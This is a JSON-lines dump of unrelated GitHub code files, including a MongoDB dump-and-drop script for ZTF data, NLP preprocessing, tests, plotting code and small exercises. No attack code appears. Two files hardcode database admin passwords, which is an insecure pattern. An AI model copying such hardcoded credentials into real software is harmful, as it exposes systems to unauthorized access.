'https://www.skyscrapercity.com/forums/proposed-skyscrapers.1728/',\n 'https://www.skyscrapercity.com/forums/megatalls.4070/',\n 'https://www.skyscrapercity.com/forums/supertalls.902/',\n 'https://www.skyscrapercity.com/forums/proposed-supertalls.1718/',\n ]\n\n crawler.crawl(forums, depth=args.depth)\n crawler.display_and_save_stats()\n\n 
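# final pass: fill in coordinates for cities inserted during the crawl (delegates to utils.update_city_coordinates)\n    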
crawler.update_city_coordonates()\n","repo_name":"waxisien/skycrawler","sub_path":"scripts/searchengine.py","file_name":"searchengine.py","file_ext":"py","file_size_in_byte":5885,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"33155813425","text":"import argparse\nimport pathlib\nimport subprocess\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n # parser.add_argument('--keepall', action='store_true', help='keep all fields from the matchfiles?')\n # parser.add_argument('--test', action='store_true', help='test')\n parser.add_argument(\n \"--np\", type=int, default=96, help=\"number of processes for parallel ingestion\"\n )\n parser.add_argument(\"--bs\", type=int, default=2048, help=\"batch size for ingestion\")\n parser.add_argument(\n \"--tag\", type=str, default=\"20201201\", help=\"mf release time tag\"\n )\n parser.add_argument(\n \"--path\",\n type=str,\n default=str(pathlib.Path.home() / \"tmp\"),\n help=\"local tmp path\",\n )\n\n args = parser.parse_args()\n\n path_tmp = pathlib.Path(args.path)\n if not path_tmp.exists():\n path_tmp.mkdir(parents=True, exist_ok=True)\n\n subprocess.run(\n [\n \"docker\",\n \"exec\",\n \"-it\",\n \"kowalski_ingester_1\", # \"/bin/bash\", \"-c\",\n \"mkdir\",\n \"-p\",\n f\"/_tmp/ztf_matchfiles_{args.tag}/\",\n ]\n )\n\n rc_start, rc_stop = 0, 63\n\n # cli argument - rc#: [0, 63] ? no, just iterate over range(0, 64) for the stuff below:\n for rc in range(rc_start, rc_stop + 1):\n # fetch matchfiles from gs://ztf-matchfiles-t_tag/rc/ to /_tmp/ztf-matchfiles-t_tag/\n subprocess.run(\n [\n \"docker\",\n \"exec\",\n \"-it\",\n \"kowalski_ingester_1\",\n \"/usr/local/bin/gsutil\",\n \"-m\",\n \"cp\",\n f\"gs://ztf-matchfiles-{args.tag}/{rc}/*.pytable\",\n # f\"gs://ztf-matchfiles-{args.tag}/{rc}/ztf_000245_zg_c01_q1_match.pytable\", # test\n f\"/_tmp/ztf_matchfiles_{args.tag}/\",\n ]\n )\n # run ingest_ztf_matchfiles.py\n subprocess.run(\n [\n \"docker\",\n \"exec\",\n \"-it\",\n \"kowalski_ingester_1\",\n \"python\",\n \"/app/ingest_ztf_matchfiles.py\",\n \"--rm\",\n \"--tag\",\n args.tag,\n \"--np\",\n str(args.np),\n \"--bs\",\n str(args.bs),\n ]\n )\n # dump to /_tmp/\n with open(path_tmp / f\"ZTF_sources_{args.tag}.rc{rc:02d}.dump\", \"w\") as f:\n subprocess.run(\n [\n \"docker\",\n \"exec\",\n \"kowalski_mongo_1\",\n \"mongodump\",\n \"-u=mongoadmin\",\n \"-p=mongoadminsecret\",\n \"--authenticationDatabase=admin\",\n \"--archive\",\n \"--db=kowalski\",\n f\"--collection=ZTF_sources_{args.tag}\",\n ],\n stdout=f,\n )\n # lbzip2 the dump\n subprocess.run(\n [\n \"lbzip2\",\n \"-v\",\n \"-f\",\n \"-n\",\n str(args.np),\n str(path_tmp / f\"ZTF_sources_{args.tag}.rc{rc:02d}.dump\"),\n ]\n )\n # mv to GCS\n subprocess.run(\n [\n # \"docker\", \"exec\", \"-it\", \"kowalski_ingester_1\",\n # \"/usr/local/bin/gsutil\",\n \"gsutil\",\n \"-m\",\n \"mv\",\n # f\"/_tmp/ZTF_sources_{args.tag}.rc{rc:02d}.dump.bz2\",\n str(path_tmp / f\"ZTF_sources_{args.tag}.rc{rc:02d}.dump.bz2\"),\n f\"gs://ztf-sources-{args.tag}/\",\n ]\n )\n # drop the sources collection, keep the exposures collection\n subprocess.run(\n [\n \"docker\",\n \"exec\",\n \"kowalski_mongo_1\",\n \"mongo\",\n \"-u\",\n \"mongoadmin\",\n \"-p\",\n \"mongoadminsecret\",\n \"--authenticationDatabase\",\n \"admin\",\n \"kowalski\",\n \"--eval\",\n f\"db.ZTF_sources_{args.tag}.drop()\",\n ]\n )\n\n # export exposures\n # dump to /_tmp/\n with open(\n path_tmp / 
f\"ZTF_exposures_{args.tag}.rc{rc_start:02d}_{rc_stop:02d}.dump\", \"w\"\n ) as f:\n subprocess.run(\n [\n \"docker\",\n \"exec\",\n \"kowalski_mongo_1\",\n \"mongodump\",\n \"-u=mongoadmin\",\n \"-p=mongoadminsecret\",\n \"--authenticationDatabase=admin\",\n \"--archive\",\n \"--db=kowalski\",\n f\"--collection=ZTF_exposures_{args.tag}\",\n ],\n stdout=f,\n )\n # lbzip2 the dump\n subprocess.run(\n [\n \"lbzip2\",\n \"-v\",\n \"-f\",\n \"-n\",\n str(args.np),\n str(\n path_tmp\n / f\"ZTF_exposures_{args.tag}.rc{rc_start:02d}_{rc_stop:02d}.dump\"\n ),\n ]\n )\n # mv to gs://ztf-sources-20200401\n subprocess.run(\n [\n # \"docker\", \"exec\", \"-it\", \"kowalski_ingester_1\",\n # \"/usr/local/bin/gsutil\",\n \"gsutil\",\n \"-m\",\n \"mv\",\n # f\"/_tmp/ZTF_exposures_{args.tag}.rc{rc_start:02d}_{rc_stop:02d}.dump.bz2\",\n str(\n path_tmp\n / f\"ZTF_exposures_{args.tag}.rc{rc_start:02d}_{rc_stop:02d}.dump.bz2\"\n ),\n f\"gs://ztf-sources-{args.tag}/\",\n ]\n )\n # drop the exposures collection\n subprocess.run(\n [\n \"docker\",\n \"exec\",\n \"kowalski_mongo_1\",\n \"mongo\",\n \"-u\",\n \"mongoadmin\",\n \"-p\",\n \"mongoadminsecret\",\n \"--authenticationDatabase\",\n \"admin\",\n \"kowalski\",\n \"--eval\",\n f\"db.ZTF_exposures_{args.tag}.drop()\",\n ]\n )\n","repo_name":"skyportal/kowalski","sub_path":"kowalski/tools/ztf_mf2dump.py","file_name":"ztf_mf2dump.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"27"} +{"seq_id":"42462992840","text":"import Dataset \nimport nltk,re,string,unicodedata\nfrom nltk import pos_tag\nfrom nltk.corpus import wordnet,stopwords\nfrom nltk.stem.porter import PorterStemmer\nimport re\n\nps = PorterStemmer()\n\n# Dataset final contains is a superset of true and false news \n# Remove columns not required \n\n#vview columns again \ndataset_final.columns\n\n# as we are planning to run NLP so we do not need date , and subject \ndataset_final = dataset_final.drop([\"subject\",\"date\"],axis=1)\n\n#combine the title and text as they both represents same information \n# feature engineering - created extra column using additional columns \n\ndataset_final[\"full_text\"] = dataset_final[\"title\"] + str(\" \") + dataset_final[\"text\"]\n#remove the columns that are not required now \ndataset_final = dataset_final.drop([\"title\",\"text\"],axis=1)\n\n#count of missing data in the dataframe \ncount_of_missing = dataset_final['full_text'].isna().sum()\n\nif count_of_missing > 0 : \n dataset_final=dataset_final.dropna()\n\n#Removing stopwords: \n# There are a lot of words that add no value to any text no matter the data. \n# For example, “I”, “a”, “am”, etc. \n# These words have no informational value and hence can be removed to reduce the size of our corpus \n\n#Exracting Stop Words and Punctuations that needed to be removed from the full_text column \nnltk.download('stopwords')\nstop = set(stopwords.words('english'))\npunctuation = list(string.punctuation)\nstop.update(punctuation)\n \n#Stemming the words: \n# Stemming and Lemmatization are the techniques to reduce the words to their stems or roots. \n# The main advantage of this step is to reduce the size of the vocabulary. \n# For example, words like Play, Playing, Played will be reduced to “Play”. 
\n# More Examples :\n# Stay, Stays, Staying, Stayed --> Stay\n# House, Houses, Housing --> House\n\ndef cleaning_data(text) :\n    \"\"\" Apply all cleaning functions here \"\"\"\n    #convert text into lower case \n    text = text.lower()\n    #regex to replace any numbers or special characters with a space so word boundaries are preserved \n    text = re.sub('[^a-zA-Z]',' ',text)\n\n    #split the data and make token \n    token = text.split() \n    \n    #Stem the words and remove stop words as explained above \n    text = [ps.stem(word) for word in token if not word in stop] \n    cleaned_news = ' '.join(text)\n    \n    return cleaned_news\n\n    \ndataset_final['full_text_final']=dataset_final['full_text'].apply(cleaning_data)\n\n\n\n","repo_name":"VIKASMAGGO/fakenews","sub_path":"002 Data_PrepProcess.py","file_name":"002 Data_PrepProcess.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4999908910","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\n\nfrom urllib.parse import unquote\n\nimport pytest\n\nfrom pages.firefox.accounts import FirefoxAccountsPage\n\n\n@pytest.mark.nondestructive\ndef test_account_form(base_url, selenium):\n    page = FirefoxAccountsPage(selenium, base_url, params=\"?signed-in=false\").open()\n    page.join_firefox_form.type_email(\"success@example.com\")\n    page.join_firefox_form.click_continue()\n    url = unquote(selenium.current_url)\n    assert \"email=success@example.com\" in url, \"Email address is not in URL\"\n\n\n@pytest.mark.nondestructive\n@pytest.mark.skip_if_not_firefox(reason=\"Signed-in state is shown only to Firefox users.\")\ndef test_signed_in_call_to_action(base_url, selenium):\n    page = FirefoxAccountsPage(selenium, base_url, params=\"?signed-in=true\").open()\n    assert not page.join_firefox_form.is_displayed\n    assert page.is_manage_button_displayed\n","repo_name":"mozilla/bedrock","sub_path":"tests/functional/firefox/test_accounts.py","file_name":"test_accounts.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":1125,"dataset":"github-code","pt":"27"} +{"seq_id":"11792659255","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom distinct_colours import get_distinct\n\n\n# Plotting parameters\ncols = get_distinct(1)\nlinewidth = 2\nalpha = 0.5\nfontsize = 15\n\n\nclass Measurements(object):\n    def __init__(self, var, shot):\n        skip_header = 6\n\n        if var in set(('ti1', 'ti', 'trot', 'imp')):\n            usecols = (0, 1, 3, 6)\n\n            if var == 'ti1':\n                var = var[:-1]\n\n            if var == 'trot':\n                skip_footer = 3\n            else:\n                skip_footer = 0\n\n        elif var == 'ne':\n            usecols = (0, 1, 3, 5)\n            skip_footer = 0\n        elif var == 'te':\n            usecols = (0, 1, 3, 5)\n            skip_header = 5\n            skip_footer = 0\n\n        self.var = var\n\n        # Parse input to locate corresponding file\n        if shot == 171536:\n            dirtime = 2750\n            gaproftime = 2753\n        elif shot == 171538:\n            dirtime = 2200\n            gaproftime = 2202\n        else:\n            raise ValueError('Unrecognized shot!')\n\n        dname = '%i/%ibis/uncertainties/gaprofiles' % (shot, dirtime)\n        fname = '%s/d%s.rho%i.0%i' % (dname, self.var, shot, gaproftime)\n\n        if var == 'imp':\n            fname += '_Carbon'\n\n        # Load data\n        d = np.genfromtxt(\n            fname,\n            skip_header=skip_header,\n            skip_footer=skip_footer,\n            usecols=usecols)\n\n        # Parse data\n        self.rho = d[:, 0]  # radial coordinate\n        self.y = d[:, 1]  # profile\n        self.yerr = d[:, 2]  # 
uncertainty in profile\n self.valid = d[:, 3] # point used in fit?\n\n # Determine viewing geometry\n if self.var in set(('ti', 'trot', 'imp')):\n self.view = np.genfromtxt(\n fname,\n dtype='string',\n skip_header=skip_header,\n skip_footer=skip_footer,\n usecols=(7))\n elif var == 'ne':\n self.view = np.genfromtxt(\n fname,\n dtype='string',\n skip_header=skip_header,\n skip_footer=skip_footer,\n usecols=(6))\n else:\n # For some reason, viewing geometry *not* in te file... WTF.\n # So get data from ne file\n fname = '%s/d%s.rho%i.0%i' % (dname, 'ne', shot, gaproftime)\n self.view = np.genfromtxt(\n fname,\n dtype='string',\n skip_header=6, # different than the te value... again, WTF\n usecols=(6))\n\n def plot(self, rho_lim=[0, 1], drho=0.,\n valid=True, exclude_view=None,\n ax=None, color=cols[0], marker='o', markersize=5):\n if ax is None:\n fig, ax = plt.subplots(1, 1)\n\n if valid and (exclude_view is not None):\n vind = np.where(np.logical_and(\n self.valid == 1,\n self.view != exclude_view))[0]\n elif valid:\n vind = np.where(self.valid == 1)[0]\n elif (exclude_view is not None):\n vind = np.where(self.view != exclude_view)[0]\n else:\n vind = slice(None, None)\n\n rhoind = np.where(np.logical_and(\n self.rho[vind] >= rho_lim[0],\n self.rho[vind] <= rho_lim[1]))[0]\n\n ax.errorbar(\n self.rho[vind][rhoind] + drho,\n self.y[vind][rhoind],\n yerr=self.yerr[vind][rhoind],\n color=color,\n fmt=marker,\n markersize=markersize)\n\n plt.show()\n\n return ax\n\n\nclass Uncertainty(object):\n def __init__(self, var, shot, rho=None, skiprows=5):\n if var == 'ni1' or var == 'ti1':\n var = var[:-1]\n\n self.var = var\n\n # Parse input to locate corresponding file\n if shot == 171536:\n dirtime = 2750\n gaproftime = 2753\n elif shot == 171538:\n dirtime = 2200\n gaproftime = 2202\n else:\n raise ValueError('Unrecognized shot!')\n\n dname = '%i/%ibis/uncertainties/gaprofiles' % (shot, dirtime)\n fname = '%s/d%s.xy.%i.0%i' % (dname, self.var, shot, gaproftime)\n\n if var == 'imp':\n fname += '_Carbon'\n\n # Load data\n d = np.loadtxt(fname, skiprows=skiprows)\n\n # Parse data\n self.rho = d[:, 0] # radial coordinate\n self.y = d[:, 1] # profile\n self.yerr = d[:, 2] # uncertainty in profile\n self.yperr = d[:, 3] # uncertainty in first derivative\n\n # Determine relative error in y\n self.y_relerr = self.yerr / self.y\n\n # Determine a / Ly\n yp = np.gradient(self.y) / np.gradient(self.rho)\n self.aLy = -yp / self.y\n\n # Determine relative error in a / Ly\n term1 = (self.yerr / self.y) ** 2\n term2 = (self.yperr / yp) ** 2\n self.aLy_relerr = np.sqrt(term1 + term2)\n\n # If requested, interpolate data onto new radial grid\n if rho is not None:\n self.y = np.interp(rho, self.rho, self.y)\n self.yerr = np.interp(rho, self.rho, self.yerr)\n self.yperr = np.interp(rho, self.rho, self.yperr)\n self.y_relerr = np.interp(rho, self.rho, self.y_relerr)\n self.aLy = np.interp(rho, self.rho, self.aLy)\n self.aLy_relerr = np.interp(rho, self.rho, self.aLy_relerr)\n self.rho = rho\n\n def plot(self, rholim=[0, 1]):\n rhoind = np.where(np.logical_and(\n self.rho >= rholim[0],\n self.rho < rholim[1]))[0]\n\n fig, axs = plt.subplots(1, 2, sharex=True)\n\n axs[0].plot(\n self.rho[rhoind],\n self.y_relerr[rhoind],\n color=cols[0],\n linewidth=linewidth)\n\n axs[1].semilogy(\n self.rho[rhoind],\n self.aLy_relerr[rhoind],\n color=cols[0],\n linewidth=linewidth)\n\n axs[0].set_xlabel(\n r'$\\mathregular{\\rho}$',\n fontsize=fontsize)\n axs[0].set_ylabel(\n r'$\\mathregular{\\sigma_{%s} / %s}$' % (self.var, 
self.var),\n fontsize=fontsize)\n\n axs[1].set_xlabel(\n r'$\\mathregular{\\rho}$',\n fontsize=fontsize)\n axs[1].set_ylabel(\n r'$\\mathregular{\\sigma_{L_{%s}} / L_{%s}}$' % (self.var, self.var),\n fontsize=fontsize)\n\n plt.tight_layout()\n plt.show()\n\n return\n\n\nif __name__ == '__main__':\n shot = 171536\n drho = 0.005\n rho = np.arange(0, 1 + drho, drho)\n\n for profile in ['ne', 'te', 'ti', 'trot']:\n u = Uncertainty(profile, shot, rho=rho)\n u.plot()\n","repo_name":"emd/thesis","sub_path":"Chapters/TurbulenceMeasurements/figs/get_uncertainty.py","file_name":"get_uncertainty.py","file_ext":"py","file_size_in_byte":6660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34542336265","text":"from blogforum.db import get_db\nimport mysql.connector as sql\nimport csv\n\nconfig = {\n 'user': 'root',\n 'password': 'p',\n 'host': '127.0.0.1',\n 'database': 'blogdb',\n 'raise_on_warnings': True,\n}\n\n#saves user report csv to server to be downloaded\ndef generate_userreport():\n\n cnx = sql.connect(**config)\n cursor = cnx.cursor()\n\n query = (\"SELECT userId,username,firstName,lastName,dateCreated FROM Users\")\n\n cursor.execute(query)\n\n all_users = cursor.fetchall()\n\n out = [[\"User ID\",\"Username\",\"First Name\",\"Last Name\",\"Account Created\"]]\n\n for u in all_users:\n iout = []\n for i in range(len(u)):\n iout.append(u[i])\n out.append(iout)\n\n # write to existing file in reports folder\n with open(\"blogforum/reports/user_report.csv\", 'w+') as f:\n writer = csv.writer(f)\n writer.writerows(out)\n\n#saves report to csv file to server to be downloaded\ndef generate_blogreport():\n\n cnx = sql.connect(**config)\n cursor = cnx.cursor()\n\n query = (\"SELECT postid,u.username,postdate,subject,body FROM posts p JOIN Users u ON p.creatorid=u.userID\")\n\n cursor.execute(query)\n\n all_posts = cursor.fetchall()\n\n out = [[\"Post ID\",\"Username\",\"Post Date\",\"Title\",\"Body\"] ]\n\n for p in all_posts:\n iout = []\n for i in range(len(p)):\n iout.append(p[i])\n out.append(iout)\n\n # write to existing file in reports folder\n with open(\"blogforum/reports/blog_report.csv\", 'w+') as f:\n writer = csv.writer(f)\n writer.writerows(out)\n\n\ndef generate_all_reports():\n generate_userreport()\n generate_blogreport()\n","repo_name":"Namsinh/408-finalproject","sub_path":"408-FinalProject/blogforum/generate_reports.py","file_name":"generate_reports.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70901063432","text":"class Jedi:\n def __init__(self, **kwargs) -> None:\n self.__name = kwargs.get('name', None)\n self.__height = kwargs.get('height', 0)\n self.__title = kwargs.get('title', None)\n self.__side = kwargs.get('side', None)\n self.__light_saber = kwargs.get('light_saber', None)\n\n def __str__(self) -> str:\n return \"\\nName: {}\\nHeight: {}\\nTitle: {}\\nSide: {}\\nlight_saber: {}\\n\".format(\n self.__name, self.__height, self.__title, self.__side, self.__light_saber\n )\n\n @property\n def name(self):\n return self.__name\n\n @name.setter\n def name(self, value):\n self.__name = value\n\n @property\n def height(self):\n return self.__height\n\n @height.setter\n def height(self, height):\n if height in range(135, 203):\n self.__height = height\n else:\n raise ValueError('Incorrect growth')\n\n @property\n def title(self):\n return self.__title\n\n @title.setter\n def title(self, value):\n self.__title = 
value\n\n @property\n def side(self):\n return self.__side\n\n @side.setter\n def side(self, value):\n self.__side = value\n\n @property\n def light_saber(self):\n return self.__light_saber\n\n @light_saber.setter\n def light_saber(self, value):\n self.__light_saber = value\n\n\nif __name__ == \"__main__\":\n anakin_skywalker = Jedi(\n name='Anakin Skywalker',\n height=188,\n title='Jedi Knight',\n side='The bright side',\n light_saber='Blue',\n )\n anakin_skywalker.name = 'Darth Vader'\n anakin_skywalker.height = 202\n anakin_skywalker.title = 'The dark lord of the sith'\n anakin_skywalker.side = 'The dark side'\n anakin_skywalker.light_saber = 'Red'\n print(anakin_skywalker)\n\n anakin_skywalker.name = 'Young Anakin Skywalker'\n anakin_skywalker.height = 135\n anakin_skywalker.title = 'The Racer from Tatooine'\n anakin_skywalker.side = 'The bright side'\n anakin_skywalker.light_saber = None\n print(anakin_skywalker)\n","repo_name":"dust2907/HW_SkillUp","sub_path":"Lesson 3-8/HW 3-8.py","file_name":"HW 3-8.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4461774498","text":"from random import choice\r\nimport string\r\n\r\n\r\nclass Infinite_Monkey:\r\n def __init__(self, frase):\r\n self.frase = frase\r\n self._frase_length = len(frase)\r\n self._count = 0\r\n self._result = self.monkey_guess(self.frase)\r\n\r\n @property\r\n def result(self):\r\n return self._result\r\n\r\n def monkey_prints(self, frase_length):\r\n letters = string.ascii_lowercase + ' '\r\n monkey_guess = ''\r\n for _ in range(frase_length):\r\n monkey_guess += choice(letters)\r\n return monkey_guess\r\n\r\n def monkey_compares(self, guess):\r\n letter_count = 0\r\n letters_matched = 0\r\n for _ in range(self._frase_length):\r\n if self.frase[letter_count] == guess[letter_count]:\r\n letters_matched += 1\r\n letter_count += 1\r\n return letters_matched\r\n\r\n def monkey_guess(self, frase):\r\n best_match = [0, '']\r\n found = False\r\n while not found:\r\n self._count += 1\r\n attempt = self.monkey_prints(self._frase_length)\r\n if attempt == frase:\r\n print('Match found!')\r\n found = True\r\n letters_matched_in_attempt = self.monkey_compares(attempt)\r\n if letters_matched_in_attempt >= best_match[0]:\r\n best_match = [letters_matched_in_attempt, attempt]\r\n if self._count % 1000 == 0:\r\n print(f'On count {str(self._count)} best match is \"{best_match[1]}\".')\r\n return f'It took {str(self._count)} attempts to generate \"{self.frase}\".'\r\n\r\n\r\nif __name__ == \"__main__\":\r\n first_try = Infinite_Monkey('meth')\r\n second_try = Infinite_Monkey('meth')\r\n third_try = Infinite_Monkey('meth')\r\n print(f'\\nFirst try:\\n{first_try.result}')\r\n print(f'\\nSecond try:\\n{second_try.result}')\r\n print(f'\\nThird try:\\n{third_try.result}\\n')","repo_name":"fortredux/py_miscellaneous","sub_path":"miller_ranum/infinite_monkeys.py","file_name":"infinite_monkeys.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72822566471","text":"\"\"\"Baseclass for system evaluations.\"\"\"\nfrom abc import ABC, abstractmethod, abstractproperty\nimport logging\nfrom typing import List\n\nfrom ...const import CoreState\nfrom ...coresys import CoreSys, CoreSysAttributes\nfrom ..const import UnsupportedReason\n\n_LOGGER: logging.Logger = logging.getLogger(__name__)\n\n\nclass EvaluateBase(ABC, CoreSysAttributes):\n 
\"\"\"Baseclass for evaluation.\"\"\"\n\n def __init__(self, coresys: CoreSys) -> None:\n \"\"\"Initialize the evaluation class.\"\"\"\n self.coresys = coresys\n\n async def __call__(self) -> None:\n \"\"\"Execute the evaluation.\"\"\"\n if self.sys_core.state not in self.states:\n return\n if await self.evaluate():\n if self.reason not in self.sys_resolution.unsupported:\n self.sys_resolution.unsupported = self.reason\n _LOGGER.warning(\n \"%s (more-info: https://www.openpeerpower.io/more-info/unsupported/%s)\",\n self.on_failure,\n self.reason.value,\n )\n else:\n if self.reason in self.sys_resolution.unsupported:\n _LOGGER.info(\"Clearing %s as reason for unsupported\", self.reason)\n self.sys_resolution.dismiss_unsupported(self.reason)\n\n @abstractmethod\n async def evaluate(self):\n \"\"\"Run evaluation.\"\"\"\n\n @property\n @abstractproperty\n def reason(self) -> UnsupportedReason:\n \"\"\"Return a UnsupportedReason enum.\"\"\"\n\n @property\n @abstractproperty\n def on_failure(self) -> str:\n \"\"\"Return a string that is printed when self.evaluate is False.\"\"\"\n\n @property\n def states(self) -> List[CoreState]:\n \"\"\"Return a list of valid states when this evaluation can run.\"\"\"\n return []\n","repo_name":"OpenPeerPower/supervisor","sub_path":"supervisor/resolution/evaluations/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"1509144330","text":"import functools\n\nfrom flask import render_template\n\n\nWHITE = \"#ffffff\"\nGREY_1 = \"#fafafa\"\nGREY_2 = \"#f5f5f5\"\nGREY_3 = \"#dddddd\"\nGREY_4 = \"#aaaaaa\"\nBLACK = \"#000000\"\nRED_1 = \"#ff4d88\"\nRED_2 = \"#e60047\"\nRED_3 = \"#990033\"\nALERT_GREEN = \"#82ff82\"\nALERT_YELLOW = \"#eeff88\"\nALERT_RED = \"#ff4d88\"\nGREEN = \"#476b6b\"\nBLUE = \"#22408f\"\n\n\ndef get_color_styles():\n \"\"\"\n :rtype: str\n :return: css styles consisting of color variables\n \"\"\"\n str_ = \":root {\\n\"\n str_ += \" --white: {};\\n\".format(WHITE)\n str_ += \" --grey-1: {};\\n\".format(GREY_1)\n str_ += \" --grey-2: {};\\n\".format(GREY_2)\n str_ += \" --grey-3: {};\\n\".format(GREY_3)\n str_ += \" --grey-4: {};\\n\".format(GREY_4)\n str_ += \" --black: {};\\n\".format(BLACK)\n str_ += \" --red-1: {};\\n\".format(RED_1)\n str_ += \" --red-2: {};\\n\".format(RED_2)\n str_ += \" --red-3: {};\\n\".format(RED_3)\n str_ += \" --alert-green: {};\\n\".format(ALERT_GREEN)\n str_ += \" --alert-yellow: {};\\n\".format(ALERT_YELLOW)\n str_ += \" --alert-red: {};\\n\".format(ALERT_RED)\n str_ += \" --green: {};\\n\".format(GREEN)\n str_ += \" --blue: {};\\n\".format(BLUE)\n str_ += \"}\\n\"\n return str_\n\n\ndef render_colors(func_):\n \"\"\"\n :type func\\_: func\n :param func\\_: :func:`~flask.render_template`\n :rtype: func\n :return: decorated function\n \"\"\"\n @functools.wraps(func_)\n def wrapper(*args, **kwargs):\n return func_(*args, color_styles=get_color_styles(), **kwargs)\n return wrapper\n\n\ncolored_template = render_colors(render_template)\n","repo_name":"hjanka/polyfemos","sub_path":"polyfemos_source/front/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39509717343","text":"#\n# @lc app=leetcode id=449 lang=python3\n#\n# [449] Serialize and Deserialize BST\n#\nfrom collections import deque\n\n\n# @lc code=start\n# Definition for a binary tree node.\nclass 
TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Codec:\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\n \"\"\"\n if not root:\n return ''\n\n data = []\n q = deque()\n q.append(root)\n while q:\n node = q.popleft()\n data.append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n\n return '|'.join([str(d) for d in data])\n\n def deserialize(self, data: str) -> TreeNode:\n \"\"\"Decodes your encoded data to tree.\n \"\"\"\n if not data:\n return None\n\n data = data.split('|')\n root = TreeNode(int(data[0]))\n for i in range(1, len(data)):\n val = int(data[i])\n self._insert_to_bst(root, val)\n\n return root\n\n def _insert_to_bst(self, root, val):\n if not root:\n return\n\n node = root\n while node:\n if val > node.val:\n if node.right:\n node = node.right\n else:\n node.right = TreeNode(val)\n return\n else:\n if node.left:\n node = node.left\n else:\n node.left = TreeNode(val)\n return\n\n\n# Your Codec object will be instantiated and called as such:\n# ser = Codec()\n# deser = Codec()\n# root = TreeNode(9)\n# root.left = TreeNode(6)\n# root.right = TreeNode(11)\n# root.left.left = TreeNode(2)\n# root.right.right = TreeNode(12)\n# root.left.right = TreeNode(7)\n# tree = ser.serialize(root)\n# ans = deser.deserialize(tree)\n# print(ans)\n# @lc code=end\n","repo_name":"domosnake/leetcode_solution","sub_path":"449.serialize-and-deserialize-bst.py","file_name":"449.serialize-and-deserialize-bst.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8464365294","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport tensorflow as tf\nfrom typing import (\n AnyStr, List\n)\n\nfrom .BaseLineProcessor import BaseLineProcessor\n\n\nclass TargetContextBasedLineProcessor(BaseLineProcessor):\n def line_process(self, record_str):\n # type: (str) -> List\n record_list = record_str.split(sep=',')\n if len(record_list) != 2:\n raise ValueError(\"Length of record_list: {} is not 2\".format(record_list))\n current_word, context_word = map(lambda x: int(x), record_list)\n return [(current_word, context_word)]\n","repo_name":"howl-anderson/entity2embedding","sub_path":"entity2embedding/corpora/builder/TargetContextBasedLineProcessor.py","file_name":"TargetContextBasedLineProcessor.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"} +{"seq_id":"33909298562","text":"from . import extension\nfrom .. 
import utils, constants\nfrom hata.discord import client_core\nfrom hata import backend, discord\nfrom time import time\n\nclass Fun(extension.Extension):\n    def __init__(self, client):\n        self.client = client\n        self.chat_grabbers = []\n\n    async def send_start_message(self, chat_grabber: utils.ChatGrabber):\n        embed = discord.Embed(color=constants.Colors.BLUE, description='Say hi, you\\'re talking to people in **{}**'.format(chat_grabber.destination.guild))\n        await self.client.message_create(chat_grabber.origin, embed=embed)\n        embed = discord.Embed(color=constants.Colors.BLUE, description='Say hi, you\\'re talking to people in **{}**'.format(chat_grabber.origin.guild))\n        await self.client.message_create(chat_grabber.destination, embed=embed)\n\n    async def send_stop_message(self, chat_grabber: utils.ChatGrabber):\n        embed = discord.Embed(color=constants.Colors.BLUE, description='You\\'re no longer talking to people in **{}**'.format(chat_grabber.destination.guild))\n        await self.client.message_create(chat_grabber.origin, embed=embed)\n        embed = discord.Embed(color=constants.Colors.BLUE, description='You\\'re no longer talking to people in **{}**'.format(chat_grabber.origin.guild))\n        await self.client.message_create(chat_grabber.destination, embed=embed)\n\n    async def create_chat(self, message):\n        if any(message.channel in (c.origin, c.destination) for c in self.chat_grabbers):\n            await self.client.message_create(message.channel, 'This channel is already chatting.')\n            return\n        try:\n            chat_grabber = next(c for c in self.chat_grabbers if not c.started)\n            chat_grabber.set_destination(message.channel)\n            await chat_grabber.start()\n        except StopIteration:\n            embed = discord.Embed(color=constants.Colors.BLUE, description='**Looking for someone who wants to talk to you**')\n            await self.client.message_create(message.channel, content=message.author.mention, embed=embed)\n            chat_grabber = utils.ChatGrabber(\n                self.client, \n                message.channel, \n                timeout=30,\n                start_hook=self.send_start_message,\n                stop_hook=self.send_stop_message,\n                destination_to_origin=True\n            )\n            self.chat_grabbers.append(chat_grabber)\n            backend.future_or_timeout(chat_grabber.destination_future, 30)\n            try:\n                await chat_grabber.destination_future\n            except TimeoutError:\n                embed = discord.Embed(color=constants.Colors.RED, description=':x: **No one 